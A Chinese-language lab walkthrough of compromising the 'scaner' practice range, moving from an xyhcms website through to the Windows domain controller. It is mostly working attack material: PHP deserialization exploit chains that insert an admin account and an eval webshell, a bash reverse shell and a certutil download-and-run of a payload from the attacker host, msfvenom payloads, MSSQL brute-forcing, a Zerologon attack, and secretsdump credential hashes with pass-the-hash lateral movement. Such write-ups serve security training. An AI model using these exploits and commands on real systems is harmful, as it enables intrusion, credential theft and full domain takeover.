scaner 从外网到内网域渗透

本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

环境配置

靶场信息

用到的虚拟机共有三个 分别是 12server-db 、12-dc 、web1

12server-db、web1 这两个可以使用桥接或者nat模式根据需求可以设置 网卡1

12-dc用的是VMnet 19 这台机子已经绑定ip

主机名 ip 账号和密码
web1 192.168.0.160 web1 root@123
db 192.168.0.161
10.10.10.136 		administrator qweasd666
ad 10.10.10.135 scaner\administrator QWEasd000
scaner\db db123456

web1 网站 http://192.168.0.160/xyhai.php?s=/Login/index admin 123456qq
外网面板地址: http://116.27.231.161:8888/e955a525
内网面板地址: http://192.168.0.160:8888/e955a525
username: m0gy9yes
password: c693d359

db主机上的 mssql服务 sa freepass

访问 http://192.168.0.160/

网络拓扑图

外网打点

扫描端口

nmap -v -sV -A 192.168.0.160

Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-01 11:28 CST
Happy 25th Birthday to Nmap, may it live to be 125!
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Initiating Ping Scan at 11:28
Scanning 192.168.0.160 [2 ports]
Completed Ping Scan at 11:28, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.01s elapsed
Initiating Connect Scan at 11:28
Scanning 192.168.0.160 [1000 ports]
Discovered open port 8888/tcp on 192.168.0.160
Discovered open port 80/tcp on 192.168.0.160
Discovered open port 888/tcp on 192.168.0.160
Completed Connect Scan at 11:28, 4.57s elapsed (1000 total ports)
Initiating Service scan at 11:28
Scanning 3 services on 192.168.0.160
Completed Service scan at 11:29, 6.03s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.0.160.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.61s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.03s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Nmap scan report for 192.168.0.160
Host is up (0.00099s latency).
Not shown: 994 filtered tcp ports (no-response)
PORT     STATE  SERVICE  VERSION
20/tcp   closed ftp-data
21/tcp   closed ftp
22/tcp   closed ssh
80/tcp   open   http     Apache httpd
|_http-server-header: Apache
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: BC2D3C52FF445E759E5EB54AB8239359
|_http-title: \xE6\x88\x91\xE7\x9A\x84\xE7\xBD\x91\xE7\xAB\x99
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
888/tcp  open   http     Apache httpd
|_http-server-header: Apache
|_http-title: 403 Forbidden
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
8888/tcp open   http     nginx
| http-title: \xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\xB1\xE8\xB4\xA5
|_Requested resource was /login
|_http-favicon: Unknown favicon MD5: B351F027909EE2AC274599CE01D004E9
| http-methods:
|_  Supported Methods: GET POST
Service Info: Host: 0b842aa5.phpmyadminNSE: Script Post-scanning.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.85 seconds

访问 8888 端口,发现是宝塔面板。

信息收集

访问 80 端口

发现是 xyhcms ,在 https://evalshell.com/ 搜索一下,历史漏洞。

gobuster 扫描网站

简单扫描一下 获取网站目录结构

gobuster dir -u http://192.168.0.160/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -x '.php' -o

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.160/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2022/09/01 11:46:11 Starting gobuster in directory enumeration mode
===============================================================
/home                 (Status: 200) [Size: 10964]
/archive              (Status: 200) [Size: 5485]
/index                (Status: 200) [Size: 10964]
/home.php             (Status: 200) [Size: 10964]
/search               (Status: 200) [Size: 4375]
/index.php            (Status: 200) [Size: 10964]
/uploads              (Status: 301) [Size: 300] [--> http://192.168.0.160/uploads/]
/0                    (Status: 200) [Size: 10964]
/go                   (Status: 200) [Size: 0]
/index2               (Status: 200) [Size: 383]
/mobile               (Status: 200) [Size: 7627]
/member               (Status: 302) [Size: 0] [--> /index.php?s=/Home/Public/login.html]
/mobile.php           (Status: 200) [Size: 7627]
/Home                 (Status: 200) [Size: 10964]
/Home.php             (Status: 200) [Size: 10964]
/show                 (Status: 200) [Size: 2829]
/special              (Status: 200) [Size: 4444]
/review               (Status: 200) [Size: 0]
/Search               (Status: 200) [Size: 4375]
/Index                (Status: 200) [Size: 10964]
/Archive              (Status: 200) [Size: 5485]
/guestbook            (Status: 200) [Size: 5129]
/avatar               (Status: 301) [Size: 299] [--> http://192.168.0.160/avatar/]
/Public               (Status: 301) [Size: 299] [--> http://192.168.0.160/Public/]
/LICENSE              (Status: 403) [Size: 262]
/Mobile               (Status: 200) [Size: 7627]
/Mobile.php           (Status: 200) [Size: 7627]
/Data                 (Status: 301) [Size: 297] [--> http://192.168.0.160/Data/]
/App                  (Status: 301) [Size: 296] [--> http://192.168.0.160/App/]

存在目录可浏览

敏感目录可浏览:

http://192.168.0.160/App/

thinkphp日志目录

http://192.168.0.160/App/Runtime/Logs/Common/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log
http://192.168.0.160/App/Runtime/Logs/Home/22_05_06.log

目录报错 得到网站路径

http://192.168.0.160/App/Runtime/common~runtime.php

Fatal error: Class 'Think\Think' not found in
/www/wwwroot/www.xycms.com/App/Runtime/common~runtime.php on line 65

xyhcms 反序列化漏洞分析

xyhcms是thinkphp3.2.3框架开发的,thinkphp的漏洞都是默认存在的(我自己测试发现不存在,可能是thinkphp的版本比较低,漏洞利用工具没有poc吧)。

痛失CVE之xyhcms(thinkphp3.2.3)反序列化: https://www.freebuf.com/articles/web/264645.html

作者说的这个版本是旧版,新版的版本已经把site.php放到一个随机值的目录下,因为网站存在目录浏览可以对其进行访问

http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php

我们先去下载一下对应的 cms 版本,进行代码审计。

idea 动态调试设置

首先开启xdebug

找到我们使用的 php 版本在 php.ini 中添加以下内容,并重新启动 apache 服务。

xdebug.remote_autostart=1
xdebug.remote_enable=On
xdebug.idekey="PHPSTORM"

IDEA 设置php以及 xdebug

调试服务器设置

设置DBGp代理

测试动态调试是否成功,我们先在代码中下一个断点,点击监听

xyhcms 反序列化入口分析

根据文章 我们搜索 unserialize 最后发现下面这个函数

/*** 得到指定cookie的值** @param string $name*/
//function get_cookie($name, $key = '@^%$y5fbl') {function get_cookie($name, $key = '') {if (!isset($_COOKIE[$name])) {return null;}$key = empty($key) ? C('CFG_COOKIE_ENCODE') : $key;$value = $_COOKIE[$name];$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($value);return unserialize($value);
}

根据注释以及代码,可以发现是用来获取cookie的,其中在获取到cookie后使用 php_decrypt 解密,然后进行反序列化 return 出去

我们来理一下流程:

获取cookie --> 如果key为空使用默认的key(引入了解密类),进行解密 --> 反序列化解密后的内容并且return出去

因为网站存在目录浏览,其中的key我们可以在下面的文件中得到

http://www.xyhcms.com/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c_config/site.php // VjP8u3rZw

我们搜索一下 get_cookie 的用法可以看得出来普通会员在登录的时候会调用这个函数

我们去注册一个普通会员,验证一下。

xyhcms 加解密分析

class SysCrypt {private $crypt_key;// 构造函数 public function __construct() {// $this -> crypt_key = $crypt_key;// new 一个类的时候需要传入一个 key,这个key我们是知道的// 所以我们可以直接把它写死$this -> crypt_key = "VjP8u3rZw";}// 传入内容进行加密public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}// 传入内容进行解密public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}

反序列化利用添加后台管理员

还是太菜了,文章后面的看不懂了。

根据文章中的利用方法:

  1. 通过某处leak出目标的WEB目录**(e.g. DEBUG页面)**
  2. 开启恶意MySQL恶意服务端设置读取的文件为目标的数据库配置文件
  3. 触发反序列化
  4. 触发链中PDO连接的部分
  5. 获取到目标的数据库配置
  6. 使用目标的数据库配置再次出发反序列化
  7. 触发链中DELETE语句的SQL注入

文章地址:https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA

POC

<?php
namespace Think\Db\Driver{use PDO;class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件);protected $config = array("debug"    => 1,"database" => "thinkphp3","hostname" => "127.0.0.1","hostport" => "3306","charset"  => "utf8","username" => "root","password" => "");}
}namespace Think\Image\Driver{use Think\Session\Driver\Memcache;class Imagick{private $img;public function __construct(){$this->img = new Memcache();}}
}namespace Think\Session\Driver{use Think\Model;class Memcache{protected $handle;public function __construct(){$this->handle = new Model();}}
}namespace Think{use Think\Db\Driver\Mysql;class Model{protected $options   = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new Mysql();$this->options['where'] = '';$this->pk = 'id';$this->data[$this->pk] = array("table" => "mysql.user where 1=updatexml(1,user(),1)#","where" => "1=1");}}
}namespace {echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

利用恶意mysql服务器读取文件

GitHub地址:https://github.com/Gifts/Rogue-MySql-Server

修改exp中的读取文件位置为

C:\\Penetration\\TrafficTools\\phpStudyV8\\WWW\\www.xyhcms.com\\App\\Common\\Conf\\db.php

网站的简单路径可以访问以下url报错获得

/App/Api/Conf/config.php

/App/Api/Controller/ApiCommonController.class.php

/App/Common/LibTag/Other.class.php

/App/Common/Model/ArcViewModel.class.php

修改我们上面poc连接的mysql地址

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn"    => "mysql:host=192.168.0.23;dbname=xyhcms;port=3306","username" => "root","password" => "root");
}namespace Think;
class Model{protected $options   = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0");}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name, $key = '') {$key = 'VjP8u3rZw';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args, $key = '') {$key = 'VjP8u3rZw';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}$b = new \Think\Image\Driver\Imagick();
$a = set_cookie($b,'');
echo str_replace('+','%2B',$a);

xyhcms getshell

使用以下poc 插入管理员账号 test ,密码:123456

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn" => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306","username" => "root","password" => "9a973fd7928bb3c2");
}namespace Think;
class Model{protected $options   = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0;insert into www_xycms_com.xyh_admin (id,username,password,encrypt,user_type,is_lock,login_num) VALUES (null,'test','88bf2f72156e8e2accc2215f7a982a83','sggFkZ',9,0,4);");}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name) {$key = 'P4tzizR6d';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args) {$key = 'P4tzizR6d';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}use \Think\Image\Driver\Imagick;
echo set_cookie(new Imagick());

使用以下exp 插入一句话

<?php
namespace Think\Db\Driver;
use PDO;
class Mysql{protected $options = array(PDO::MYSQL_ATTR_LOCAL_INFILE => true);protected $config = array("dsn" => "mysql:host=127.0.0.1;dbname=www_xycms_com;port=3306","username" => "root","password" => "9a973fd7928bb3c2");
}namespace Think;
class Model{protected $options   = array();protected $pk;protected $data = array();protected $db = null;public function __construct(){$this->db = new \Think\Db\Driver\Mysql();$this->options['where'] = '';$this->pk = 'luoke';$this->data[$this->pk] = array("table" => "xyh_admin_log","where" => "id=0; alter table xyh_guestbook add column `<script language='php'>eval(\$_POST[x]);</script>` varchar(10);");}
}namespace Think\Session\Driver;
class Memcache{protected $handle;public function __construct() {$this->handle = new \Think\Model();}
}namespace Think\Image\Driver;
class Imagick{private $img;public function __construct() {$this->img = new \Think\Session\Driver\Memcache();}
}namespace Common\Lib;
class SysCrypt{private $crypt_key;public function __construct($crypt_key) {$this -> crypt_key = $crypt_key;}public function php_encrypt($txt) {srand((double)microtime() * 1000000);$encrypt_key = md5(rand(0,32000));$ctr = 0;$tmp = '';for($i = 0;$i<strlen($txt);$i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $encrypt_key[$ctr].($txt[$i]^$encrypt_key[$ctr++]);}return base64_encode(self::__key($tmp,$this -> crypt_key));}public function php_decrypt($txt) {$txt = self::__key(base64_decode($txt),$this -> crypt_key);$tmp = '';for($i = 0;$i < strlen($txt); $i++) {$md5 = $txt[$i];$tmp .= $txt[++$i] ^ $md5;}return $tmp;}private function __key($txt,$encrypt_key) {$encrypt_key = md5($encrypt_key);$ctr = 0;$tmp = '';for($i = 0; $i < strlen($txt); $i++) {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];}return $tmp;}public function __destruct() {$this -> crypt_key = null;}
}function get_cookie($name) {$key = 'P4tzizR6d';$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_decrypt($name);return unserialize($value);
}function set_cookie($args) {$key = 'P4tzizR6d';$value = serialize($args);$key = md5($key);$sc = new \Common\Lib\SysCrypt($key);$value = $sc->php_encrypt($value);return $value;
}use \Think\Image\Driver\Imagick;
echo set_cookie(new Imagick());

在后台清理缓存 访问 http://192.168.0.160//index.php?s=/Guestbook/index.html 生成缓存再使用反序列化exp访问

# webshell 地址
http://192.168.0.160/App/Runtime/Data/3277c100b8afcccfb950d28a6ff7113c__fields/www_xycms_com.xyh_guestbook.php

linux 提权

绕过宝塔命令执行

这里我们可以看到是无法执行命令的,前期我们就知道这是一个宝塔搭建的网站,宝塔的网站对一些敏感函数禁用比较厉害

bt 禁止命令执行 可以通过 插件进行绕过 如果tmp目录下有这个文件 /tmp/php-cgi-56.sock

可以通过 PHP_FRM 进行绕过

使用绕过的 webshell 执行命令,收集一下系统信息。

unix:///tmp/php-cgi-56.sock

这里我们先反弹一个shell出来方便提权

sh -i >& /dev/tcp/192.168.0.23/6666 0>&1

使用python创建一个交互shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

使用 kali 搜索一下提权 exp

searchsploit ubuntu 5.4.0

没有找到什么有用的,我们使用比较新的提权漏洞 CVE-2021-3493,使用 webshell 上传我们的文件

chmod +x exploit.c
gcc -o exploit exploit.c
chmod +x exploit
./exploit

上线msf

生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.0.23 LPORT=5555 -f elf > shell.elf

设置监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.23
set lport 5555
run

上传木马使用 root 权限执行

chmod +x shell.elf
./shell.elf

成功获取到 root shell

内网渗透

查看网卡

只有存在一个网段 192.168.0.1/24

设置路由以及代理使用 fscan 扫描内网

设置路由

# 设置路由
run autoroute -s 192.168.0.1/24
# 查看路由
run autoroute -p

设置使用代理

background
use auxiliary/server/socks_proxy

设置 /etc/proxychains4.conf

socks5  127.0.0.1 1080

使用 fscan 扫描内网

proxychains4 ./fscan_amd64_1.6 -h 192.168.0.1/24

# 扫描结果
start infoscan
The current user permissions unable to send icmp packets
start ping
(icmp) Target '192.168.0.1' is alive
(icmp) Target '192.168.0.2' is alive
(icmp) Target '192.168.0.23' is alive
(icmp) Target '192.168.0.161' is alive
(icmp) Target '192.168.0.160' is alive
icmp alive hosts len is: 5
192.168.0.161:1433 open
192.168.0.161:445 open
192.168.0.1:445 open
192.168.0.161:139 open
192.168.0.161:80 open
192.168.0.160:80 open
192.168.0.161:135 open
192.168.0.1:139 open
192.168.0.1:135 open
192.168.0.160:888 open
192.168.0.23:1080 open
192.168.0.160:8888 open
alive ports len is: 12
start vulscan
[*] 192.168.0.1          WORKGROUP\PENETRATION
[+] 192.168.0.1 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]192.168.0.161[->]db[->]10.10.10.136[->]192.168.0.161
[*] WebTitle:http://192.168.0.161      code:404 len:315    title:Not Found
[*] 192.168.0.161        SCANER\DB                Windows Server 2012 R2 Standard 9600
NetInfo:
[*]192.168.0.1[->]penetration[->]192.168.1.8[->]192.168.10.1[->]192.168.0.1[->]10.10.10.1[->]240e:398:54a4:1a50:8038:7e62:830b:2a04[->]240e:398:54a4:1a50:b871:fbd2:3951:ed0c
[*] WebTitle:http://192.168.0.160:888  code:403 len:263    title:403 Forbidden
[*] WebTitle:http://192.168.0.160:8888 code:302 len:199    title:Redirecting...
[*] WebTitle:http://192.168.0.160:8888/login code:200 len:24     title:安全入口校验失败
[+] InfoScan:http://192.168.0.160:8888/login [宝塔-BT.cn]
[*] WebTitle:http://192.168.0.160      code:200 len:12     title:我的网站
已完成 14/14
scan end

发现一台主机 192.168.0.161 存在 mssql 服务

使用 Hydra 爆破 mssql 密码

一般情况下 mssql 的账号都为 sa,我们也可以添加账号文本进行爆破。

proxychains4 hydra -l sa -P /usr/share/wordlists/top10000.txt 192.168.0.161 mssql -vV -f

成功爆破到密码

  • sa
  • freepass

使用 mssqlclient.py 连接 mssql并上线cs

proxychains4 python3 mssqlclient.py sa@192.168.0.161
freepass

开启xp_cmd执行命令

enable_xp_cmdshell
xp_cmdshell whoami

cs生成木马 命令下载木马执行获得shell

监听和生成木马我就不做了。

# 下载木马
xp_cmdshell certutil -urlcache -split -f http://192.168.0.23:8080/artifact.exe c:/windows/temp/artifact.exe
# 执行木马
xp_cmdshell c:/windows/temp/artifact.exe

成功上线

使用 MS16-075 提权

使用 ms16-075 提权

进行信息收集

网卡信息

shell ipconfig

存在第二个网段 10.10.10.1/24

设置代理使用 fscan 扫描

设置 /etc/proxychains4.conf

socks4  127.0.0.1 1089

代理使用 fscan 扫描

proxychains4 ./fscan_amd64_1.6 -h 10.10.10.1/24

# 扫描结果
start infoscan
The current user permissions unable to send icmp packets
start ping
(icmp) Target '10.10.10.1' is alive
(icmp) Target '10.10.10.135' is alive
(icmp) Target '10.10.10.136' is alive
icmp alive hosts len is: 3
10.10.10.135:88 open
10.10.10.135:445 open
10.10.10.136:135 open
10.10.10.136:1433 open
10.10.10.1:139 open
10.10.10.135:135 open
10.10.10.1:135 open
10.10.10.136:80 open
10.10.10.136:445 open
10.10.10.1:445 open
10.10.10.136:139 open
10.10.10.135:139 open
10.10.10.1:443 open
alive ports len is: 13
start vulscan
[+] 10.10.10.1 CVE-2020-0796 SmbGhost Vulnerable
NetInfo:
[*]10.10.10.1[->]penetration[->]192.168.1.8[->]192.168.10.1[->]192.168.0.1[->]10.10.10.1[->]240e:398:54a4:1a50:8038:7e62:830b:2a04[->]240e:398:54a4:1a50:b871:fbd2:3951:ed0c
NetInfo:
[*]10.10.10.136[->]db[->]10.10.10.136[->]192.168.0.161
NetInfo:
[*]10.10.10.135[->]ad[->]10.10.10.135
[*] 10.10.10.136         SCANER\DB                Windows Server 2012 R2 Standard 9600
[*] WebTitle:http://10.10.10.136       code:404 len:315    title:Not Found
[*] 10.10.10.135   [+]DC __MSBROWSE__\AD                Windows Server 2012 R2 Standard 9600
[*] 10.10.10.135  (Windows Server 2012 R2 Standard 9600)
[*] WebTitle:https://10.10.10.1        code:403 len:0      title:None
已完成 16/16
scan end

发现域控

域控信息收集

shell net time /domain
# 获得域控主机名 ad.scaner.sec

使用 zerologon 攻击域控

exp下载地址:https://github.com/VoidSec/CVE-2020-1472

置空域控密码

proxychains4 python3 cve-2020-1472-exploit.py -t 10.10.10.135 -n ad

攻击成功 !

secretsdump.py 读取 Hash

proxychains4 python3 secretsdump.py scaner.sec/ad\$@10.10.10.135 -no-pass

# 读取结果
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation[proxychains] Strict chain  ...  127.0.0.1:1089  ...  10.10.10.135:445  ...  OK
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Strict chain  ...  127.0.0.1:1089  ...  10.10.10.135:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1089  ...  10.10.10.135:49157  ...  OK
Administrator:500:aad3b435b51404eeaad3b435b51404ee:35dc382e7d31f6823c2e34216d4c15cb:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:699ff4337d59499ab67f9967ace8afec:::
scaner.sec\db:1614:aad3b435b51404eeaad3b435b51404ee:5a63042c9c9d2e99956f1414e2bfcee6:::
AD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DB$:1615:aad3b435b51404eeaad3b435b51404ee:63dea6de1590fd5bf9e0e1531aa9d0a2:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:2978bba376f83eab7acfd4a2e3c68f41b0fbf90f85014d8ec136cb0f9ab06460
krbtgt:aes128-cts-hmac-sha1-96:e73c9453f5df1077d1132c562c3b20df
krbtgt:des-cbc-md5:91f2ab6198c1adf2
scaner.sec\db:aes256-cts-hmac-sha1-96:21a881e53c7acb3ca6dfe29b94ad56f90e72f3771695e3413a1eda1394b076b5
scaner.sec\db:aes128-cts-hmac-sha1-96:83044b37dab189c04fff6d5ca76a4251
scaner.sec\db:des-cbc-md5:f2cd2c3bceae0dcd
AD$:aes256-cts-hmac-sha1-96:182d64eca1353b996e52514e769373643eb9d0ad78c8203ddfe9be00ff9e2930
AD$:aes128-cts-hmac-sha1-96:9b3827f3d3c26a50b1ca574908577948
AD$:des-cbc-md5:e6fd2cae86c479fb
DB$:aes256-cts-hmac-sha1-96:d748cb5d58bc9f2b853e89b8a2d390ed5d9d8366086c0dd0e542baf02cf37d3c
DB$:aes128-cts-hmac-sha1-96:87a5c15f59f462741136ec3fdac2e615
DB$:des-cbc-md5:e691e6139e32dfc8
[*] Cleaning up...

域控上线 cs

在上面我们已经获得了一个 Administrator 的 Hash,先上线一手cs

使用图形化上线 cs

设置转发上线

添加一个密码凭证

添加一个目标

使用 psexec64 进行横向移动

成功上线

使用命令上线 cs

同样设置转发上线

建立 IPC$ 连接

pth scaner\administrator 35dc382e7d31f6823c2e34216d4c15cb
# 测试是否建立IPC$连接
shell dir \\10.10.10.135\c$

jump 上线cs

jump psexec64 10.10.10.135 re_tcp

恢复域控密码

导出注册表

把下面内容保存为 bat 脚本,在目标机器执行。

reg save HKLM\SYSTEM c:\system.save
reg save HKLM\SAM c:\sam.save
reg save HKLM\SECURITY c:\security.save

下载注册表文件

使用 impacket 工具包中的 secretsdump.py 读取出 $MACHINE.ACC 的 Hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

# 执行结果
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation[*] Target system bootKey: 0x34f31a092a249b2515d55516e01ccb3a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e7d7b11f5b4352988cddcd12daa1510:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
SCANER.SEC/db:$DCC2$10240#db#b2c8206c5a3cc07e3f34b53c23ab2a26
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:e95fe4b136a34299edcabc9d49068c3df6cc89c5e94a31bca5c2f9ba24eb2cd4b421b4c50b967a3d40c46413764cc9a0675ef67c1cb0d6313242b55c8a6b8ae1211e8f4b69eedb98bc6e86bd2f3076f4b7380412b6834333d6c7a24d137a2823ccd5ac0ef344c878f939e10b88eac4a097f7df7e28d5188092a2e5d11e898ac75a306e7bfd56ef842c4d701c063efbeb03f80453edadf75e07bc0c96a27ea21577e2be606348ca4a333f8b9a8c291f3b15e37d00d0a49a182cd5ed8a48bd0cb7ef968a55964d8cc7b768007bcbf1580be46a939f33dbbd4d6a70af0afff534625e1e5b419e43cb49d46b6312e6d30eba
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:63dea6de1590fd5bf9e0e1531aa9d0a2
[*] DPAPI_SYSTEM
dpapi_machinekey:0x853d47834a284f96d756c69dd569b5a0bdaed756
dpapi_userkey:0x505968a6643a760441727edff825458bf54c1ba6
